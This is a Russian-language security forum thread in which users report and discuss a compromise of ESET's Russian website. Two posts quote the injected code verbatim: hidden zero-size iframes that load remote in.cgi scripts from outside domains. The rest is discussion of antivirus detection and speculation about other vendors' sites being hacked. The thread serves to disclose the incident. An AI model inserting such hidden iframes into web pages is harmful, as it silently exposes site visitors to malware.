Перейти к содержанию

Recommended Posts

Umnik

На http://esetnod32.ru/ висит скрытый фрейм:

</body><iframe pcvsn='j6Av392D' src='хttp://newiframe.com/s/in.cgi?6' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe></html>

Говорят, минимум второй день висит.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
ALEX(XX)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
EzzO

ой ой ой, сайт антивирусной компании заражен, как-то правильно. Куда смотрят смотрящие?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion

iFrame я больше не вижу на странице.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Cooller

Уже значит убрали.

Сейчас они типа расследование будут проводить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lias

ага

По данному инциденту в настоящее время проводится проверка.

вот интересно - а взламывали ли сайты других вендоров??

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Cooller
вот интересно - а взламывали ли сайты других вендоров??

Конечно, вот например сайт антивируса Панды и не один раз.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lias

Конечно, вот например сайт антивируса Панды и не один раз.
и там тоже подсаживали трояна?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

Жесть ваще....Заговор внутри компании? ))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
Жесть ваще....Заговор внутри компании? ))

м.б типичное разгильдяйство?..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
м.б типичное разгильдяйство?..

Это, скорее всего, уже как следствие! )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Ну должен же их "давно и в муках искавшийся" российский вирусный аналитик, широко известный в узких кругах "летун отовсюду", г-н Матросов, с чего-то начинать на новом месте ? :)

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Skorpion
Снова сайт инфицирован...

Походу там есетовцам глубоко положить на то, что пользователи рискуют быть зараженными.

<iframe gmwhl='4uLDSwqX' src='http://mobi-sripts.com/s/in.cgi?6 ' mytog='xordoTPZ' width='0' height='0' style='display:none'></iframe>

Антивирусы реагируют?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

У меня при переходе по ссылке ТЕХНИЧЕСКИЙ ФОРУМ переходит на viruslab.ru - Антивирус Панды...Может они и взломали?! ))))

Ваще жесть....дааааааа

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Форум anti-malware.ru атакован спамерами?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
Форум anti-malware.ru атакован спамерами?

Это почему?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Zilla

Ну по моим личным наблюдениям сложилось такое мнение :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

А сайт до сих пор инфицирован...уже и письмо им написал, и позвонил....Без толку!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Danilka
Антивирусы реагируют?

KIS 2010 да.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович

А НОД не реагирует! ((

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Fox

Ох нифига. Я зашел и все скрипты разрешил. Что теперь будет? (антивирус не отреагировал)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Евгений Павлович
Ох нифига. Я зашел и все скрипты разрешил. Что теперь будет? (антивирус не отреагировал)

Остаётся только задуматься!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • demkd
      проверил, работает, но стоит помнить что кэш используется только при массовой проверке и только для файлов не получивших статус проверенного ранее.
      для проверки отдельного файла кэш не используется по очевидным причинам.
    • PR55.RP55
      Определять время применения GPO Определять время применения GPO - с привязкой к событию. ( например запуск... скрипта ) Писать в Инфо.
    • PR55.RP55
      Настройка vtCacheDays= не работает. ( залез, а в папке сотни файлов  ) пробовал менять настройки\даты - не работает.  
    • demkd
      ---------------------------------------------------------
       4.12.3
      ---------------------------------------------------------
       o Добавлено несколько новых ключей автозапуска.  o Добавлен новый флаг запуска "Проверять весь HKCR".
         Не всегда требуется загружать и проверять все CLSID (по умолчанию флаг установлен).
         Снятие флага значительно ускорит скорость построения образа автозапуска за счет существенного сокращения файлов в списке.
         Если флаг установлен:
          o Твик #37 не исправит все проблемные пути в реестре
          o Функция удаления ссылок на отсутствующие файлы не затронет незагруженную часть HKCR.  o Улучшена функция парсинга командной строки.  o Исправлена функция восстановления реестра для неактивной системы.
         Добавлено удаление старых логов реестра, они могли препятствовать загрузке хайвов после оффлайн восстановления реестра.
         Обновлен ABR до версии 1.10, в него внесены аналогичные с uVS изменения.
          o Автозагрузка службы ABR теперь работает в отложенном режиме для устранение возможного сбоя загрузки пользовательского хайва реестра.
          o Добавлен модуль defrag для дефрагментации и устранения ошибок в сохраненной копии реестра.  o В окно информации о задаче добавлены даты создания и последнего запуска.  o Теперь в лог добавляется предупреждение о слишком длинных строках в реестре (более 2к символов).  o Исправлена ошибка в функции внесения данных из reg-файла в реестр неактивной системы.  o Добавлена поддержка кэша задач версий 1(Win8 и 8.1) и 2(некоторые серверные версии). (ранее поддерживалась только 3-я версия Win10/Win11).  o Исправлена ошибка которая могла привести к переполнению буфера.  
    • Ego Dekker
      Домашние антивирусы для Windows были обновлены до версии 16.0.24.
×